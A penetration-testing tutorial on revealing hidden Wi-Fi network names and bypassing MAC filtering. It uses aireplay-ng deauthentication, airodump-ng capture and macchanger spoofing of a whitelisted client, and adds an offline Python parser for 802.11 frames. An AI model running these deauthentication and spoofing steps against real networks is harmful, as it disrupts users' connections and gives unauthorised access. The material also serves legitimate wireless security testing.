How to find a hidden Wi-Fi name and bypass MAC filtering
To perform a thorough penetration test of wireless access points you need a pair of USB Wi-Fi adapters with chipsets that support monitor mode and packet injection, and you will usually want to modify them: replace the stock antennas with directional external ones for wardriving, and raise the transmit power by increasing the txpower value where the driver allows it.
A hidden network name and MAC-address filtering of clients are weak protections against attack. The SSID and a whitelisted client address are easy to learn: either wait for the next client to (re)connect, or force one to do so immediately with a deauthentication attack. This article covers how to learn the name of a hidden Wi-Fi network and how to bypass MAC filtering.
How to find the name of a hidden WiFi network
The wireless network name (SSID, or ESSID) is sometimes hidden as a protective measure. It does cut off the neophytes and noticeably reduces the number of people who try to connect: if the target is not visible, many do not attack it. Finding out the SSID is nevertheless simple, because the name still goes over the air in cleartext every time a client connects.
Hiding the SSID only removes it from the AP's beacons. A client that wants to join must still name the network: its probe request and association request carry the SSID, the network's identifier (BSSID, normally the same as the AP's MAC address) and the client's own MAC address, all unencrypted. A deauthentication attack is therefore the standard way to learn the SSID of a hidden network: if we capture the frames a legitimate client sends when it reconnects to the selected access point, we see the name immediately. It is enough to run one command and wait.
It is assumed that your wardriving adapter is wlan1, its power has already been raised, and it is already in monitor mode. If not, bring it down (ifconfig wlan1 down) and put it into monitor mode with airmon-ng start wlan1 (recent versions create a separate monitor interface, typically wlan1mon; substitute that name in the commands below), then start airodump-ng on the monitor interface to listen to the air. airodump-ng itself does not switch the adapter into monitor mode.
A spontaneous reconnection can take an arbitrarily long time, so let's speed the process up. Open a second terminal window and send a broadcast deauthentication there, forcing every client of the selected AP to reconnect and shout its SSID to the whole air:
aireplay-ng -0 5 -a D8:FE:E3:XX:XX:XX wlan1
This command sends five rounds of deauthentication packets to all clients of the access point with the MAC address D8:FE:E3:XX:XX:XX (I hide part of the address, as usual, indulging my paranoia). The result did not take long.
Almost immediately the network name appeared in the main airodump-ng window. While it was hidden, airodump-ng displayed only its length in place of the name (six characters in this example).
How to bypass filtering by MAC-address
In addition, admins create whitelists of wireless devices, allowing only specific MAC addresses to connect. With MAC filtering enabled the access point refuses to associate a third-party device even if it presents the correct password.
What matters to us is this: if a client device is connected to the selected access point, it is guaranteed to be on the whitelist. All that remains is to kick it off the target AP, assign its MAC address (which is broadcast in the clear) to your own Wi-Fi adapter, and connect before the trusted device does. To have time for that, run the deauthentication command in parallel in another terminal window and send it from the second dongle. Here is how it looks step by step on the AP from the example above.
1. Raise the adapter's power, mask its MAC address, and put it into monitor mode.

2. Listen to the air:

airodump-ng wlan1

The table shows the access points and the MAC addresses of the clients connected to them (see the STATION column opposite the required AP).

3. Assign that client's MAC address to one of our dongles (macchanger needs the interface to be down while it changes the address):

macchanger --mac=64:DB:43:XX:XX:XX wlan1

4. From the second adapter (called wlan2 here; the setup above did not name it) fire the deauthentication packets:

aireplay-ng -0 5 -a D8:FE:E3:XX:XX:XX wlan2

5. Connect with the first adapter, switched back to managed mode, as soon as the real client is cut off from the AP. The real client will try to reconnect every time it is kicked, so keep the deauthentication running from wlan2 until your association is established.
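As an added illustration of both sections (this is example code, not part of the original article or of the aircrack-ng suite), here is a small Python parser that pulls from raw 802.11 management frames exactly what airodump-ng shows on screen: the cloaked SSID length from the AP's beacons, the real SSID from a client's association request, and the client MAC that the same request reveals as a whitelist candidate. The frames are constructed inside the script (the addresses and the name "Office" are made up), so it runs offline; the header layout, subtype codes and SSID element ID are the standard IEEE 802.11 ones, and no radiotap header is assumed.

```python
import struct

# IEEE 802.11 management-frame subtypes (frame type 0)
ASSOC_REQ, PROBE_REQ, BEACON = 0x0, 0x4, 0x8
# Fixed fields that precede the tagged parameters (IEs) in each body:
# beacon = timestamp(8) + interval(2) + capability(2); assoc req = capability(2) + listen interval(2)
FIXED_BODY_LEN = {ASSOC_REQ: 4, PROBE_REQ: 0, BEACON: 12}
IE_SSID = 0  # element ID of the SSID information element


def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def parse_mgmt(frame):
    """Parse a raw 802.11 management frame (no radiotap header).

    Returns None for non-management frames or subtypes we do not handle, else a dict with
    the subtype, transmitter address (addr2), BSSID (addr3) and the SSID element:
    'ssid' is the cleartext name, or None if the element is absent or cloaked; 'hidden_len'
    is the advertised length of a cloaked (all-zero) SSID, which is what airodump-ng
    shows as <length: N> for a hidden network.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:            # frame type 0 = management
        return None
    subtype = (fc0 >> 4) & 0xF
    if subtype not in FIXED_BODY_LEN:
        return None
    info = {"subtype": subtype, "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]), "ssid": None, "hidden_len": None}
    body = frame[24 + FIXED_BODY_LEN[subtype]:]
    i = 0
    while i + 2 <= len(body):             # walk the tagged parameters: id, len, data
        ie_id, ie_len = body[i], body[i + 1]
        data = body[i + 2:i + 2 + ie_len]
        if len(data) < ie_len:            # truncated element: stop rather than misparse
            break
        if ie_id == IE_SSID:
            if ie_len == 0 or not any(data):
                info["hidden_len"] = ie_len
            else:
                info["ssid"] = data.decode("utf-8", "replace")
            break
        i += 2 + ie_len
    return info


def reveal(frames, target_bssid):
    """Given captured frames, return the hidden SSID of target_bssid and the client MACs
    seen associating to it (the candidates for the AP's MAC-filter whitelist)."""
    ssid, hidden_len, clients = None, None, set()
    for f in frames:
        p = parse_mgmt(f)
        if p is None or p["bssid"] != target_bssid:
            continue
        if p["subtype"] == BEACON and p["hidden_len"] is not None:
            hidden_len = p["hidden_len"]
        if p["subtype"] == ASSOC_REQ:     # a client must name the network to join it
            clients.add(p["src"])
            if p["ssid"]:
                ssid = p["ssid"]
    return {"ssid": ssid, "hidden_len": hidden_len, "clients": sorted(clients)}


# --- constructed sample capture (made-up addresses, not real traffic) ---
def mgmt_frame(subtype, addr1, addr2, addr3, body):
    fc = bytes([subtype << 4, 0x00])      # version 0, type 0 (management), given subtype
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def ie(ie_id, data):
    return bytes([ie_id, len(data)]) + data


AP = bytes.fromhex("d8fee3000001")        # constructed AP address / BSSID
CLIENT = bytes.fromhex("64db43000002")    # constructed whitelisted client
BCAST = b"\xff" * 6

SAMPLE_FRAMES = [
    # beacon from the AP with a cloaked 6-byte SSID (all zeros): name hidden, length leaks
    mgmt_frame(BEACON, BCAST, AP, AP,
               bytes(8) + struct.pack("<HH", 100, 0x0411)
               + ie(IE_SSID, bytes(6)) + ie(1, b"\x82\x84\x8b\x96")),
    # the client reconnects after a deauth: its association request carries the real SSID
    mgmt_frame(ASSOC_REQ, AP, CLIENT, AP,
               struct.pack("<HH", 0x0411, 10)
               + ie(IE_SSID, b"Office") + ie(1, b"\x82\x84\x8b\x96")),
]

if __name__ == "__main__":
    print(reveal(SAMPLE_FRAMES, "D8:FE:E3:00:00:01"))
```

The parser stops at the first SSID element and refuses to read past a truncated element, which is the kind of malformed frame an injection tool or a hostile AP can put on the air. Feeding it real traffic only requires stripping the radiotap header from each captured packet first.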
That's all. Now you know how to find out the SSID of a hidden network and the MAC addresses of its clients.